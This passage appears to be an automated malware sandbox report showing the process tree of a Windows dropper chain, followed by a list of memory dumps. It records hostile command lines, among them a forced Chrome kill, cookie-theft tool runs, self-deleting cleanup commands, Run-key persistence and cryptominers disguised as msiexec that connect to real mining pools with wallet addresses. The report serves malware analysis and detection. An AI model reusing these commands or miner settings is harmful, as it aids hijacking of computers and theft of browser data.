                                    11⤵
                                    • Executes dropped EXE
                                    PID:1808
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=3819674613747793755 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=3819674613747793755 --renderer-client-id=8 --mojo-platform-channel-handle=1856 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:2616
                                  • C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe
                                    "C:\Users\Admin\AppData\Local\vghd\bin\QtWebEngineProcess.exe" --type=renderer --no-sandbox --disable-gpu-memory-buffer-video-frames --enable-threaded-compositing --enable-features=AllowContentInitiatedDataUrlNavigations --disable-features=MojoVideoCapture,SurfaceSynchronization,UseModernMediaControls,UseVideoCaptureApiForDevToolsSnapshots --disable-gpu-compositing --service-pipe-token=4662479919381697574 --lang=en-US --webengine-schemes=qrc:sLV --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=4662479919381697574 --renderer-client-id=9 --mojo-platform-channel-handle=2564 /prefetch:1
                                    11⤵
                                    • Executes dropped EXE
                                    PID:1844
                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1496
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im chrome.exe
                        5⤵
                          PID:1668
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im chrome.exe
                            6⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:400
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"
                        4⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        PID:2132
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                          5⤵
                            PID:2192
                            • C:\Windows\SysWOW64\rundll32.exe
                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                              6⤵
                              • Loads dropped DLL
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2360
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Modifies data under HKEY_USERS
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2212
                          • C:\Users\Admin\AppData\Roaming\DD08.tmp.exe
                            "C:\Users\Admin\AppData\Roaming\DD08.tmp.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:2464
                            • C:\Users\Admin\AppData\Roaming\DD08.tmp.exe
                              "C:\Users\Admin\AppData\Roaming\DD08.tmp.exe"
                              6⤵
                              • Executes dropped EXE
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2580
                          • C:\Users\Admin\AppData\Roaming\DE12.tmp.exe
                            "C:\Users\Admin\AppData\Roaming\DE12.tmp.exe"
                            5⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of SetThreadContext
                            • Modifies system certificate store
                            PID:2484
                            • C:\Windows\system32\msiexec.exe
                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                              6⤵
                                PID:2800
                              • C:\Windows\system32\msiexec.exe
                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                                6⤵
                                • Blocklisted process makes network request
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2880
                            • C:\Users\Admin\AppData\Roaming\DEAF.tmp.exe
                              "C:\Users\Admin\AppData\Roaming\DEAF.tmp.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:2536
                              • C:\Windows\SysWOW64\cmd.exe
                                /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DEAF.tmp.exe
                                6⤵
                                  PID:2148
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 3
                                    7⤵
                                    • Delays execution with timeout.exe
                                    PID:2208
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                5⤵
                                  PID:2232
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 127.0.0.1
                                    6⤵
                                    • Runs ping.exe
                                    PID:2344
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:2324
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2780
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                4⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                PID:2504
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2512
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2332
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1812
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3032

                        Network

                        MITRE ATT&CK Enterprise v6

                        Downloads

                        • memory/872-125-0x0000000000BD0000-0x0000000000C37000-memory.dmp (Filesize 412KB)
                        • memory/872-118-0x0000000000830000-0x0000000000874000-memory.dmp (Filesize 272KB)
                        • memory/884-197-0x0000000005010000-0x0000000005011000-memory.dmp (Filesize 4KB)
                        • memory/892-2-0x0000000074D91000-0x0000000074D93000-memory.dmp (Filesize 8KB)
                        • memory/992-45-0x000007FEF7570000-0x000007FEF77EA000-memory.dmp (Filesize 2.5MB)
                        • memory/1016-202-0x0000000000401000-0x00000000004B7000-memory.dmp (Filesize 728KB)
                        • memory/1236-71-0x0000000000401000-0x000000000040C000-memory.dmp (Filesize 44KB)
                        • memory/1344-43-0x000007FEF5160000-0x000007FEF5B4C000-memory.dmp (Filesize 9.9MB)
                        • memory/1344-50-0x000000001AE30000-0x000000001AE32000-memory.dmp (Filesize 8KB)
                        • memory/1344-48-0x0000000000F20000-0x0000000000F21000-memory.dmp (Filesize 4KB)
                        • memory/1352-73-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp (Filesize 9.6MB)
                        • memory/1352-70-0x00000000022B0000-0x00000000022B2000-memory.dmp (Filesize 8KB)
                        • memory/1352-54-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp (Filesize 9.6MB)
                        • memory/1620-78-0x0000000000240000-0x0000000000241000-memory.dmp (Filesize 4KB)
                        • memory/1964-86-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp (Filesize 9.6MB)
                        • memory/1964-87-0x000007FEF0FB0000-0x000007FEF194D000-memory.dmp (Filesize 9.6MB)
                        • memory/1964-89-0x0000000000B30000-0x0000000000B32000-memory.dmp (Filesize 8KB)
                        • memory/2004-42-0x0000000002390000-0x000000000252C000-memory.dmp (Filesize 1.6MB)
                        • memory/2124-158-0x0000000000400000-0x000000000043D000-memory.dmp (Filesize 244KB)
                        • memory/2124-157-0x0000000000220000-0x000000000025C000-memory.dmp (Filesize 240KB)
                        • memory/2124-154-0x0000000000400000-0x000000000043D000-memory.dmp (Filesize 244KB)
                        • memory/2192-116-0x0000000002600000-0x0000000002604000-memory.dmp (Filesize 16KB)
                        • memory/2212-135-0x0000000002590000-0x00000000025D8000-memory.dmp (Filesize 288KB)
                        • memory/2212-106-0x0000000000020000-0x000000000002D000-memory.dmp (Filesize 52KB)
                        • memory/2232-186-0x0000000002740000-0x0000000002744000-memory.dmp (Filesize 16KB)
                        • memory/2340-204-0x000000006E421000-0x000000006E423000-memory.dmp (Filesize 8KB)
                        • memory/2340-203-0x00000000003D0000-0x00000000003D1000-memory.dmp (Filesize 4KB)
                        • memory/2360-122-0x0000000000170000-0x00000000001AA000-memory.dmp (Filesize 232KB)
                        • memory/2360-123-0x0000000000360000-0x00000000003B6000-memory.dmp (Filesize 344KB)
                        • memory/2416-127-0x00000000004B0000-0x0000000000517000-memory.dmp (Filesize 412KB)
                        • memory/2416-173-0x0000000002770000-0x0000000002873000-memory.dmp (Filesize 1.0MB)
                        • memory/2464-130-0x0000000001CE0000-0x0000000001CF1000-memory.dmp (Filesize 68KB)
                        • memory/2464-136-0x0000000000260000-0x00000000002A7000-memory.dmp (Filesize 284KB)
                        • memory/2484-134-0x000007FEFB931000-0x000007FEFB933000-memory.dmp (Filesize 8KB)
                        • memory/2536-148-0x00000000071C0000-0x000000000C63C000-memory.dmp (Filesize 84.5MB)
                        • memory/2536-150-0x0000000000400000-0x000000000587C000-memory.dmp (Filesize 84.5MB)
                        • memory/2544-228-0x0000000066806000-0x0000000066CCF000-memory.dmp (Filesize 4.8MB)
                        • memory/2544-224-0x0000000001120000-0x0000000001121000-memory.dmp (Filesize 4KB)
                        • memory/2544-227-0x00000000668F6000-0x0000000066DBF000-memory.dmp (Filesize 4.8MB)
                        • memory/2544-345-0x0000000066D95000-0x0000000066DBF000-memory.dmp (Filesize 168KB)
                        • memory/2544-209-0x0000000000A70000-0x0000000000A80000-memory.dmp (Filesize 64KB)
                        • memory/2544-344-0x0000000066CA5000-0x0000000066CCF000-memory.dmp (Filesize 168KB)
                        • memory/2544-235-0x00000000669E6000-0x0000000066EAF000-memory.dmp (Filesize 4.8MB)
                        • memory/2544-236-0x0000000065E66000-0x000000006632F000-memory.dmp (Filesize 4.8MB)
                        • memory/2544-255-0x0000000065DF6000-0x00000000662BF000-memory.dmp (Filesize 4.8MB)
                        • memory/2544-246-0x0000000066886000-0x0000000066D4F000-memory.dmp (Filesize 4.8MB)
                        • memory/2544-247-0x0000000066796000-0x0000000066C5F000-memory.dmp (Filesize 4.8MB)
                        • memory/2544-254-0x0000000066976000-0x0000000066E3F000-memory.dmp (Filesize 4.8MB)
                        • memory/2580-131-0x0000000000400000-0x000000000044E000-memory.dmp (Filesize 312KB)
                        • memory/2580-137-0x0000000000400000-0x000000000044E000-memory.dmp (Filesize 312KB)
                        • memory/2780-166-0x000007FEF50C0000-0x000007FEF5AAC000-memory.dmp (Filesize 9.9MB)
                        • memory/2780-172-0x00000000003E0000-0x00000000003E1000-memory.dmp (Filesize 4KB)
                        • memory/2780-171-0x00000000003A0000-0x00000000003DC000-memory.dmp (Filesize 240KB)
                        • memory/2780-170-0x000000001AE60000-0x000000001AE62000-memory.dmp (Filesize 8KB)
                        • memory/2780-169-0x0000000000390000-0x0000000000391000-memory.dmp (Filesize 4KB)
                        • memory/2780-167-0x00000000000D0000-0x00000000000D1000-memory.dmp (Filesize 4KB)
                        • memory/2800-138-0x0000000140000000-0x0000000140383000-memory.dmp (Filesize 3.5MB)
                        • memory/2800-141-0x0000000140000000-0x0000000140383000-memory.dmp (Filesize 3.5MB)
                        • memory/2880-147-0x0000000140000000-0x000000014070A000-memory.dmp (Filesize 7.0MB)
                        • memory/2880-146-0x0000000000120000-0x0000000000134000-memory.dmp (Filesize 80KB)
                        • memory/2880-149-0x0000000140000000-0x000000014070A000-memory.dmp (Filesize 7.0MB)
                        • memory/2880-142-0x0000000140000000-0x000000014070A000-memory.dmp (Filesize 7.0MB)
                        • memory/2880-156-0x00000000001F0000-0x0000000000210000-memory.dmp (Filesize 128KB)
                        • memory/2892-152-0x0000000002660000-0x0000000002664000-memory.dmp (Filesize 16KB)
                        • memory/3152-346-0x0000000002780000-0x0000000002784000-memory.dmp (Filesize 16KB)